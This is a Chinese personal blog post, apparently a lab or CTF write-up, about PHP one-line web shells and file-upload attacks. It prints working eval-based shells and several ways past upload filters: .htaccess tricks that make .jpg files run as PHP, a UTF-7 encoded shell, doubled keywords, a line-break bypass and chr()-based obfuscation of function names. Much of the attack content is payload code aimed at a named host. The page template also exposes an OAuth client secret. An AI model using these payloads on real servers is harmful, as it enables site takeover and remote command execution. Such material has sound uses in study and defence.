

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" type="image/png" href="/img/avatar.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>Web安全-一句话木马 - SILIME</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/gitalk/1.6.2/gitalk.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Skr-niao'Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/IMG_3379.JPG') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-23 01:34" pubdate>
        2020年10月23日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      743 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      9
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">Web安全-一句话木马</h1>
            
            <div class="markdown-body" id="post-body">
              <h3 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h3><p>那么一句话木马到底是什么呢?</p>
<p>先来看看最简单的一句话木马：</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>($_POST[<span class="hljs-string">&#x27;cmd&#x27;</span>]) <span class="hljs-meta">?&gt;</span></code></pre>

<p>Or</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>($_GET[<span class="hljs-string">&#x27;cmd&#x27;</span>]) <span class="hljs-meta">?&gt;</span></code></pre>

<p>【<strong>基本原理</strong>】利用<strong>文件上传漏洞</strong>，往目标网站中上传一句话木马，然后你就可以在本地通过中国蚁剑即可获取和控制整个网站目录。或者GET方式传递PHP代码给服务器执行；</p>
<h3 id="入侵条件"><a href="#入侵条件" class="headerlink" title="入侵条件"></a>入侵条件</h3><p>其中，只要攻击者满足三个条件，就能实现成功入侵：</p>
<pre><code class="hljs angelscript">（<span class="hljs-number">1</span>）木马上传成功，未被杀；
（<span class="hljs-number">2</span>）知道木马的路径在哪；
（<span class="hljs-number">3</span>）上传的木马能正常运行。</code></pre>

<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>如何理解<code>eval()</code>函数？</p>
<p><strong><code>eval()</code>把字符串作为PHP代码执行</strong>。</p>
<p>例如：<code>eval(&quot;echo &#39;a&#39;&quot;)</code>;其实就等于直接 <code>echo &#39;a&#39;</code>;再来看看<code>&lt;?php eval($_POST[&#39;pw&#39;]); ?&gt;</code>首先，用post方式接收变量pw，比如接收到了：<code>pw=echo &#39;a&#39;</code>;这时代码就变成<code>&lt;?php eval(&quot;echo &#39;a&#39;;&quot;); ?&gt;</code>。结果如下：<img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023014821842.png" srcset="/img/loading.gif" alt="image-20201023014821842"></p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><ol>
<li>先直接上传php文件，不出意外会被过滤掉</li>
</ol>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023015616947.png" srcset="/img/loading.gif" alt="image-20201023015616947"></p>
<ol>
<li>修改文件名为.dqt试试</li>
</ol>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023020142732.png" srcset="/img/loading.gif" alt="image-20201023020142732"></p>
<blockquote>
<p>也不能上传，说明对内容进行了过滤Σ(っ °Д °;)っ</p>
</blockquote>
<ol start="3">
<li>去除&lt;?上传成功，说明对&lt;?进行过滤</li>
</ol>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023131917691.png" srcset="/img/loading.gif" alt="image-20201023131917691"></p>
<p>从响应体可以知道PHP版本为5.6.4</p>
<p>可以用标签风格绕过</p>
<pre><code class="hljs javascript">&lt;script language=<span class="hljs-string">&quot;php&quot;</span>&gt;
@<span class="hljs-built_in">eval</span>($_GET[<span class="hljs-string">&#x27;cmd&#x27;</span>])
&lt;/script&gt;</code></pre>

<p>4.上传执行</p>
<p>​    <strong>方法一：</strong></p>
<ol>
<li>上传.htaccess</li>
</ol>
<pre><code class="hljs applescript">AddType <span class="hljs-built_in">application</span>/x-httpd-php .jpg</code></pre>

<blockquote>
<p>作用：解析jpg文件为php</p>
</blockquote>
<ol start="2">
<li>上传1.jpg一句话木马</li>
</ol>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023132454515.png" srcset="/img/loading.gif" alt="image-20201023132454515"></p>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023133035169.png" srcset="/img/loading.gif" alt="image-20201023133035169"></p>
<p>获得网页控制权</p>
<p><strong>方法二</strong></p>
<p>PHP7以上版本，已经淘汰其它标签形式了仅剩下&lt;?php形式，可以采用特殊编码绕过，</p>
<ol>
<li>UTF-7编码一句话木马</li>
</ol>
<pre><code class="hljs php">+ADw?php +AEA-<span class="hljs-keyword">eval</span>(+ACQAXw-POST+AFs<span class="hljs-string">&#x27;cmd&#x27;</span>+AF0) ?+AD4-</code></pre>

<ol start="2">
<li>.htaccess</li>
</ol>
<pre><code class="hljs applescript">AddType <span class="hljs-built_in">application</span>/x-httpd-php .jpg
php_flag display_errors <span class="hljs-keyword">on</span>
php_flag zend.multibyte <span class="hljs-number">1</span>
php_value zend.script_encoding <span class="hljs-string">&quot;UTF-7&quot;</span></code></pre>

<ol>
<li>上传连接<img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023135524220.png" srcset="/img/loading.gif" alt="image-20201023135524220"></li>
</ol>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023135650466.png" srcset="/img/loading.gif" alt="image-20201023135650466"></p>
<blockquote>
<p>获得网页控制权</p>
</blockquote>
<h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h3><p>上传1.jpg,没发现什么异常，当访问<code>http://47.98.234.232:28015/upload/1.jpg</code></p>
<p>地址时出现了下载请求</p>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023141721858.png" srcset="/img/loading.gif" alt="image-20201023141721858"></p>
<ol>
<li><p><strong>分析：</strong></p>
<p>出现下载请求，说明上传<code>.htaccess</code>文件时，某些内容被过滤掉了，无法解析.jpg为php。</p>
</li>
<li><p>打开下载的文件</p>
</li>
</ol>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023142714863.png" srcset="/img/loading.gif" alt="image-20201023142714863"></p>
<p>果然,<code>php、eval、POST</code>都被过滤掉了哦</p>
<ol>
<li>双写这几个关键字试试</li>
</ol>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?</span>pphphp @eevalval($_PPOSTOST[<span class="hljs-string">&#x27;cmd&#x27;</span>]) <span class="hljs-meta">?&gt;</span></code></pre>

<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023143252534.png" srcset="/img/loading.gif" alt="image-20201023143252534"></p>
<p>代码被保留下来了</p>
<ol>
<li>双写<code>.htaccess</code></li>
</ol>
<pre><code class="hljs php">AddType application/x-httpd-pphphp .jpg</code></pre>

<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023143556070.png" srcset="/img/loading.gif" alt="image-20201023143556070"></p>
<p>获得网页控制权</p>
<h3 id="htaccess换行绕过"><a href="#htaccess换行绕过" class="headerlink" title=".htaccess换行绕过"></a>.htaccess换行绕过</h3><p>上传内容不能有application</p>
<p>.htaccess</p>
<pre><code class="hljs properties"><span class="hljs-attr">AddType</span> <span class="hljs-string">applic\</span>
<span class="hljs-meta">ation/x-httpd-php</span> <span class="hljs-string">.jpg</span></code></pre>

<p>1.jpg</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>($_POST[<span class="hljs-string">&#x27;cmd&#x27;</span>]) <span class="hljs-meta">?&gt;</span></code></pre>

<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023144508485.png" srcset="/img/loading.gif" alt="image-20201023144508485"></p>
<p>获得网页控制权</p>
<h3 id="函数过滤绕过"><a href="#函数过滤绕过" class="headerlink" title="函数过滤绕过"></a>函数过滤绕过</h3><p> 对危险函数进行了过滤，不允许上传，则可以使用aiisc码拼接动态构造函数来绕过。</p>
<p>使用脚本快速生成指定函数</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$a = <span class="hljs-string">&quot;函数&quot;</span>;
<span class="hljs-keyword">for</span>($i=<span class="hljs-number">0</span>;$i&lt;strlen($a);$i++)&#123;
	<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;chr(&quot;</span>.ord($a[$i]).<span class="hljs-string">&quot;).&quot;</span>;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023152524890.png" srcset="/img/loading.gif" alt="image-20201023152524890"></p>
<p><img src="/2020/10/23/Web%E5%AE%89%E5%85%A8-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/image-20201023152611507.png" srcset="/img/loading.gif" alt="image-20201023152611507"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/19/Docker/">
                        <span class="hidden-mobile">Docker 学习笔记</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    function loadGitalk() {
      addScript('https://cdn.staticfile.org/blueimp-md5/2.13.0/js/md5.min.js');
      addScript('https://cdn.staticfile.org/gitalk/1.6.2/gitalk.min.js', function () {
        var gitalk = new Gitalk({
          clientID: 'f2b04bb5133714cacf91',
          clientSecret: '736b17a89ed41199a491b77ab7b9853bfb6967a8',
          repo: 'silime.github.io',
          owner: 'silime',
          admin: ["silime"],
          id: md5(location.pathname),
          language: 'zh-CN',
          labels: ["Gitalk"],
          perPage: 10,
          pagerDirection: 'last',
          createIssueManually: true,
          distractionFreeMode: true
        });
        gitalk.render('gitalk-container');
      });
    }
    waitElementVisible('gitalk-container', loadGitalk);
  </script>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
        <br/>
        <span id="timeDate">载入天数...</span>
        <span id="times">载入时分秒...</span>
        <script src="/js/duration.js"></script>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Web安全-一句话木马&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script type="text/javascript">
      //定义获取词语下标
      var a_idx = 0;
      jQuery(document).ready(function ($) {
        //点击body时触发事件
        $("body").click(function (e) {
          //需要显示的词语
          //var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正", "法治", "爱国", "敬业", "诚信", "友善");
          var a = new Array("人生", "苦短", "我用", "Python", "Life", "is", "short", "you","need","Python");//Life is short，you need Python
          //设置词语给span标签
          var $i = $("<span/>").text(a[a_idx]);
          //下标等于原来下标+1  余 词语总数
          a_idx = (a_idx + 1) % a.length;
          //获取鼠标指针的位置，分别相对于文档的左和右边缘。
          //获取x和y的指针坐标
          var x = e.pageX, y = e.pageY;
          //在鼠标的指针的位置给$i定义的span标签添加css样式
          $i.css({
            "z-index": 999,
            "top": y - 20,
            "left": x,
            "position": "absolute",
            "font-weight": "bold",
            "color": rand_color()
          });
          // 随机颜色
          function rand_color() {
            return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
          }
          //在body添加这个标签
          $("body").append($i);
          //animate() 方法执行 CSS 属性集的自定义动画。
          //该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的，这样就可以创建动画效果。
          //详情请看http://www.w3school.com.cn/jquery/effect_animate.asp
          $i.animate({
            //将原来的位置向上移动180
            "top": y - 180,
            "opacity": 0
            //1500动画的速度
          }, 1500, function () {
            //时间到了自动删除
            $i.remove();
          });
        });
      })
      ;
    </script>
  














</body>
</html>
